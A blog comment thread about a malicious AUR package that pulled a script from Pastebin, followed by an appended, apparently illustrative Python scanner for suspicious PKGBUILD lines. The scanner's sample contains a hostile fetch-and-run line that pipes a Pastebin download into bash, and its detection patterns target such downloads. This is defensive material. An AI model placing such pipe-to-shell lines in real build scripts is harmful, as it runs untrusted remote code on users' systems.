Sad to see. No one's safe on the net, I think.
Edit: Since a while.
Anonymous, July 10, 2018 at 9:18 AM
A small typo - It was on July 7 - not June.
The malicious script was removed within approx. 9 hours.
Logix, July 10, 2018 at 10:14 AM
Corrected, thank you!
The article offers some advice on what to look for if you’re like me and just kind of do a perfunctory scan without really knowing what exactly to check. If nothing else, focus on the URLs. They will most likely follow a wget or curl command and are the most likely spot to store a malicious script. In this case, the package grabbed a script from Pastebin which should be considered a serious red flag.
That article is rather sensationalist; the ArchWiki clearly advises to check all PKGBUILDs & included files before installing AUR packages:
https://wiki.archlinux.org/index.php/Arch_User_Repository#Build_and_install_the_package
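The check described in the comments above (look at what follows `curl` or `wget` in a PKGBUILD and its included files, and treat a paste-site URL as a red flag) can be partly automated. The following is an added example, not part of the original thread or of any Arch tooling; the function name, the paste-host list beyond pastebin.com, and the sample PKGBUILD are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# pastebin.com is the host named in the thread; the others are illustrative.
PASTE_HOSTS = {"pastebin.com", "paste.ee", "hastebin.com"}
FETCH = re.compile(r"(?<![\w-])(curl|wget)\s")           # a command, not 'curl' in makedepends
URL = re.compile(r"https?://[^\s\"'|;)]+")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b")

def scan(text):
    """Return [(line_no, [reasons])] for lines of a PKGBUILD or .install
    file that fetch remote content outside the declared source=() array."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        if raw.lstrip().startswith("#"):                  # skip full-line comments
            continue
        hosts = {(urlparse(u).hostname or "").lower() for u in URL.findall(raw)}
        fetch = FETCH.search(raw)
        reasons = []
        if fetch and PIPE_TO_SHELL.search(raw):
            reasons.append("download piped straight into a shell")
        if any(h == p or h.endswith("." + p) for h in hosts for p in PASTE_HOSTS):
            reasons.append("URL points at a paste service")
        if fetch and not reasons:
            reasons.append(fetch.group(1) + " call: check what it downloads")
        if reasons:
            findings.append((no, reasons))
    return findings

# Constructed sample, not the PKGBUILD from the incident.
SAMPLE = '''\
pkgname=example-viewer
pkgver=1.0
source=("https://downloads.example.org/example-viewer-1.0.tar.gz")
makedepends=('curl')
build() {
  make
}
package() {
  # curl https://pastebin.com/raw/ignored-comment
  curl -s https://pastebin.com/raw/EXAMPLE | bash
  wget -q https://downloads.example.org/extra.dat -O "$pkgdir/extra.dat"
  install -Dm755 viewer "$pkgdir/usr/bin/viewer"
}
'''

if __name__ == "__main__":
    for line_no, reasons in scan(SAMPLE):
        print(f"line {line_no}: " + "; ".join(reasons))
```

A clean result only means none of these patterns matched; it does not replace reading the PKGBUILD and its included files as the ArchWiki advises.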